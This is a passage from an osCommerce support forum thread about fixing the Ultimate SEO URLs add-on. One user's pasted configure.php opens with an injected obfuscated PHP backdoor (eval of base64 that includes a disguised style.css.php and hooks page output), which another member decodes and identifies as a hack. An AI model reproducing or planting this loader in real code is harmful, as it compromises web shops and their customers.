• Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

[CONTRIBUTION] Ultimate SEO URLs v2.1 - by Chemo

Hi, I've installed Ultimate SEO.

I noticed that the first time I click a link on my site after installation, the URL is not a shortened URL; a URL like this comes up: http://www.somedomain.com/category.html?osCsid=0nq20ba91o9jjkide9t6ed5td7.

The second time and so forth that I click any link on my site, the URL is as intended - for example http://somedomain.com/category.html.

The same problem of the aforementioned long URL happens every time I clear my browser's cache, I've noticed.

Is this something that is intended by Ultimate SEO? Or have I not installed Ultimate SEO properly? If it is intended by Ultimate SEO, will it negatively affect search engine crawlers' indexing?

Edited by quicker

I noticed that the first time I click a link on my site after installation, the URL is not a shortened URL; a URL like this comes up: http://www.somedomain.com/category.html?osCsid=0nq20ba91o9jjkide9t6ed5td7.

The second time and so forth that I click any link on my site, the URL is as intended - for example http://somedomain.com/category.html.

The same problem of the aforementioned long URL happens every time I clear my browser's cache, I've noticed.

Is this something that is intended by Ultimate SEO? Or have I not installed Ultimate SEO properly? If it is intended by Ultimate SEO, will it negatively affect search engine crawlers' indexing?

It is how oscommerce works. Be sure you have the prevent spider option set to true in your sessions settings in admin and that you have updated your spiders file (found in the addons section) and there won't be any problems.

Edited by Jack_mcs

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

Get the latest versions of my addons

Recommended SEO Addons

I noticed that the first time I click a link on my site after installation, the URL is not a shortened URL; a URL like this comes up: http://www.somedomai...m/category.html?osCsid=0nq20ba91o9jjkide9t6ed5td7.

It is how oscommerce works. Be sure you have the prevent spider option set to true in your sessions settings in admin and that you have updated your spiders file (found in the addons section) and there won't be any problems.

Hi, thanks for the reply.

Could you tell me what the "prevent spider" option does to fix the problem?

Also, where is the addons section located so that I can update the spider file?

So, osCommerce is supposed to generate long URLs like the example I gave, and what Ultimate SEO does is shorten the URL after the first time a link is clicked?

Thanks

Could you tell me what the "prevent spider" option does to fix the problem?

Also, where is the addons section located so that I can update the spider file?

So, osCommerce is supposed to generate long URLs like the example I gave, and what Ultimate SEO does is shorten the URL after the first time a link is clicked?

That long list of characters is called the session ID (SID).

The setting doesn't fix the problem. It prevents the search engines from getting a copy of the SID, which, if they do, can cause various problems with your site.

The addons section can be found by the above menu.

You can search the forums for futher information on the session ID - it has been thoroughly covered.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

Recommended SEO Addons

Hi Jack,

I was wondering if I took .html$ out of the .htaccess file for products and categories would it work or more importantly be correct,

And display a url such as this:

http://www.site.com/my-cool-product

I got the idea from other mod rewrites on other scripts and was just curious if there was a way to get osC to do the same.

Thanks

Eric

I was wondering if I took .html$ out of the .htaccess file for products and categories would it work or more importantly be correct,

And display a url such as this:

http://www.site.com/my-cool-product

I got the idea from other mod rewrites on other scripts and was just curious if there was a way to get osC to do the same.

I doubt it but it only takes about 3 minutes to try it.

Support Links:

Recommended SEO Addons

No sir that didnt work, I also tried removing the -c- as well,

Thanks, Ill play around with it for a bit and see if I can come up with something

The -c-, -p- and all of the others are needed by the code to identify the type of page. The number is the id of the category, product, etc. and is required by the code to know which one to look up in the database. You can't remove those without changing the code.

Support Links:

Recommended SEO Addons

This worked like a charm for me. Seems to be running great now! Thanks :)

This fix was very hard to find but worked like a charm Thanks so much.

Maybe if Jack altered the install with this suggestion to the contrib,

many would not have to get answers from him like,

"read the pages, there is a fix" OMG There are hundreds of pages here with many posts in

each page. Doing a google doesn't really simplify things either.

Anyway, Thanks Dailce.... Made my day

Hi Jack.

In the webmaster tool session of google, there is a place call Sitelinks. Is the sitelinks good for SEO ? If it's good, may I can set Ultimate SEO_URL to support Google auto make sitelinks for us ? In this time, i see that structure page of oscommerce is not good for Google find out the structure sitelinks.

Paint for VietNamese :

Hi Jack.

In the webmaster tool session of google, there is a place call Sitelinks. Is the sitelinks good for SEO ? If it's good, may I can set Ultimate SEO_URL to support Google auto make sitelinks for us ? In this time, i see that structure page of oscommerce is not good for Google find out the structure sitelinks.

I'm not familiar with a section named Sitelinks. Please provide instructions on how to get to it and I will take a look.

Support Links:

Recommended SEO Addons

Hi,

I'm new here.

Today I installed Ultimate SEO v2.2-9 on to my website and at first it seemed to have worked fine... the links in the menu had been changed to be SEO friendly and the link worked when clicked.

However moments later the very same links changed to be in a format that my store cannot read.

The links went from:

/index.php?cPath=1

To:

/mypage-c-1.htm

And then to the unusable:

/index.php/cPath/1

Obviously this is not what I want as it is now impossible to see the departments via the Categories links.

I've tried turning off SEO rewrites, resetting the URL Rewrite Cache and even going as far as to remove the files and revert to previous saved versions but nothing fixes the problem... the links still read /index.php/cPath/1.

Does anyone have any ideas what I need to do to sort it?

Many thanks.

Hi,

I'm new here.

Today I installed Ultimate SEO v2.2-9 on to my website and at first it seemed to have worked fine... the links in the menu had been changed to be SEO friendly and the link worked when clicked.

However moments later the very same links changed to be in a format that my store cannot read.

The links went from:

/index.php?cPath=1

To:

/mypage-c-1.htm

And then to the unusable:

/index.php/cPath/1

Obviously this is not what I want as it is now impossible to see the departments via the Categories links.

I've tried turning off SEO rewrites, resetting the URL Rewrite Cache and even going as far as to remove the files and revert to previous saved versions but nothing fixes the problem... the links still read /index.php/cPath/1.

Does anyone have any ideas what I need to do to sort it?

Many thanks.

Apologies.

I have figured out what was wrong... I had to refresh the 'Categories Control' within the 'Cache Control'.

Tools > Cache Control > Categories Control

I'm still learning! :blush:

I'm not familiar with a section named Sitelinks. Please provide instructions on how to get to it and I will take a look.

You sign in at http://www.google.com.vn/intl/en/webmasters/ with google acc. Choose 1 domain, click "Site configuration", it will show "Sitelinks" . I think it is good for SEO because with that optimize, when user search on google, our link will show bigger, different and colorful.

I dont know exactly what structure is best for Google Sitelinks, but i think Tree form can help because I see some sites have Google Sitelinks have structure like that.

Paint for VietNamese :

You sign in at http://www.google.com.vn/intl/en/webmasters/ with google acc. Choose 1 domain, click "Site configuration", it will show "Sitelinks" . I think it is good for SEO because with that optimize, when user search on google, our link will show bigger, different and colorful.

I dont know exactly what structure is best for Google Sitelinks, but i think Tree form can help because I see some sites have Google Sitelinks have structure like that.

From that page: "Google generates these links automatically," so you don't have any control over them. But with any links the search engines create, they do so more quickly if you give them help. So you should install Google XML Sitemap SEO, Sitemap SEO and All Products SEO. All are in My Addons and all are completely compatible with my version of Ultimate SEO.

Support Links:

Recommended SEO Addons

Help! I got a serious problem.

Every time I shut down my computer OR

I clear my browser's cache,

the FIRST time I click a link on my site,

the URL is long, for example: www.domain.com/category1/?osCsid=l7p9sjkl8mk681hkvehksa3ef4.

I KNOW I already mentioned this before. BUT,

here is a related problem:

By doing the same procedure (turn off computer or clear browser cache),

and clicking another link type/area (picture/button links - 3 of them),

not only do I get a URL along the lines of www.domain.com/category--c-27?osCsid.html,

but also the page is broken. Oops! This link appears to be broken (Firefox).

The second time and so forth that I click anything, everything is fine.

I have also placed the below in the paymate area:

Hello,

I have got Ultimate SEO URLs v2.2d installed on a website and the issue that is happening is that when someone goes to pay via paymate and they confirm the order instead of being sent back to checkout_confirmation.php they get sent back to login.php. I have also had a feeling that this is happening with Paypal to. Does anyone have any ideas how we could resolve this loop issue asap.

Thanks

Jess

Edited by JZM

The second time and so forth that I click anything, everything is fine.

The code doesn't know if it is the first click or the 2nd. If it works fine all of the other times, there is something wrong with your shops configuration. See this thread for help with setting it up.

Edited by Jack_mcs

Support Links:

Recommended SEO Addons

I have got Ultimate SEO URLs v2.2d installed on a website and the issue that is happening is that when someone goes to pay via paymate and they confirm the order instead of being sent back to checkout_confirmation.php they get sent back to login.php. I have also had a feeling that this is happening with Paypal to. Does anyone have any ideas how we could resolve this loop issue asap.

That's usually a configure file problem. See the above link for how to set yours up properly.

Support Links:

Recommended SEO Addons

That's usually a configure file problem. See the above link for how to set yours up properly.

Looks ok to me:

Admin:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2NiZGVzaWduL3B1YmxpY19odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy9uZXdzbGV0dGVyL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy9kZWZhdWx0L2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
<?php
 define('HTTP_SERVER', 'http://www.domain.co.nz');
 define('HTTP_CATALOG_SERVER', 'http://www.domain.co.nz');
 define('HTTPS_CATALOG_SERVER', '');
 define('ENABLE_SSL_CATALOG', 'false');
 define('DIR_FS_DOCUMENT_ROOT', '/home/username/public_html/Store/');
 define('DIR_WS_ADMIN', '/Store/admin/');
 define('DIR_FS_ADMIN', '/home/username/public_html/Store/');
 define('DIR_WS_CATALOG', '/Store/');
 define('DIR_FS_CATALOG', '/home/username/public_html/Store/');
 define('DIR_WS_IMAGES', 'images/');
 define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
 define('DIR_WS_CATALOG_IMAGES', DIR_WS_CATALOG . 'images/');
 define('DIR_WS_INCLUDES', 'includes/');
 define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
 define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
 define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
 define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
 define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
 define('DIR_WS_CATALOG_LANGUAGES', DIR_WS_CATALOG . 'includes/languages/');
 define('DIR_FS_CATALOG_LANGUAGES', DIR_FS_CATALOG . 'includes/languages/');
 define('DIR_FS_CATALOG_IMAGES', DIR_FS_CATALOG . 'images/');
 define('DIR_FS_CATALOG_MODULES', DIR_FS_CATALOG . 'includes/modules/');
 define('DIR_FS_BACKUP', DIR_FS_ADMIN . 'backups/');

define('DB_SERVER', 'localhost');
 define('DB_SERVER_USERNAME', 'Username_Admin');
 define('DB_SERVER_PASSWORD', 'password');
 define('DB_DATABASE', 'username_Store');
 define('USE_PCONNECT', 'false');
 define('STORE_SESSIONS', 'mysql');
?>

I'm glad that it "looks ok to you" .. BUT .. you've been hacked! .. that base_64() code is actually ..

if ( function_exists( 'ob_start' ) && !isset( $GLOBALS['mfsn'] ) ) {
 $GLOBALS['mfsn'] = '/home/cbdesign/public_html/wp-content/plugins/newsletter/tiny_mce/themes/advanced/skins/default/img/style.css.php';
 if( file_exists( $GLOBALS['mfsn'] ) ) {
   include_once( $GLOBALS['mfsn'] );
   if( function_exists( 'gml' ) && function_exists( 'dgobh' ) ) { 
     ob_start('dgobh');
   }
 }
}

So there is a file /home/cbdesign/public_html/wp-content/plugins/newsletter/tiny_mce/themes/advanced/skins/default/img/style.css.php that is doing something very nasty I'd imagine.

Edited by FWR Media

The code doesn't know if it is the first click or the 2nd. If it works fine all of the other times, there is something wrong with your shops configuration. See this thread for help with setting it up.

"It's how osCommerce works" as you said last time regarding part one of the problem (long URL).

The long URL problem I've decided to ignore, because you said it could be alleviated by "preventing spider session," which I enabled.

BUT the second part of the problem I cannot ignore.

Let me elaborate for you.

Ultimate SEO tries to redirect a link on my template osCommerce.

The first time that it does so for a first-time visitor (or one who has cleared browser cache),

the link, which is among two others of its type that also have the same problem, does not render correctly.

Instead of a html page, for example: www.mydomain.com/category-cat-c27.html,

the URL that is rendered is as follows: www.mydomain.com/category-cat-c27.html?osCsid.html

The part in bold is the problem -- it makes the rendered page broken/nonexistent.

The second time and so on, presumably after caching, the URL is the first one I mentioned (www.mydomain.com/category-cat-c27.html),

and there are no broken links.

There is nothing wrong with my shop's configuration, because in my backup of my store without Ultimate SEO installed, the link, along with the two others of its type,

work correctly without broken pages.

Edited by quicker

I'm glad that it "looks ok to you" .. BUT .. you've been hacked! .. that base_64() code is actually ..

if ( function_exists( 'ob_start' ) && !isset( $GLOBALS['mfsn'] ) ) {
 $GLOBALS['mfsn'] = '/home/cbdesign/public_html/wp-content/plugins/newsletter/tiny_mce/themes/advanced/skins/default/img/style.css.php';
 if( file_exists( $GLOBALS['mfsn'] ) ) {
   include_once( $GLOBALS['mfsn'] );
   if( function_exists( 'gml' ) && function_exists( 'dgobh' ) ) { 
     ob_start('dgobh');
   }
 }
}

So there is a file /home/cbdesign/public_html/wp-content/plugins/newsletter/tiny_mce/themes/advanced/skins/default/img/style.css.php that is doing something very nasty I'd imagine.

Yep all issues were removed - no file

There is nothing wrong with my shop's configuration, because in my backup of my store without Ultimate SEO installed, the link, along with the two others of its type,

work correctly without broken pages.

That has nothing to do with it since this contribution changes the code to handle the links. It needs a properly setup configure file. If yours is, then there is something in your code, or maybe on the server causing the problem. I can, of course, be wrong. But many, many people use this contribution without a problem. It seems unlikely it is the cause of something that would be common to all.

Edited by Jack_mcs

Support Links:

Recommended SEO Addons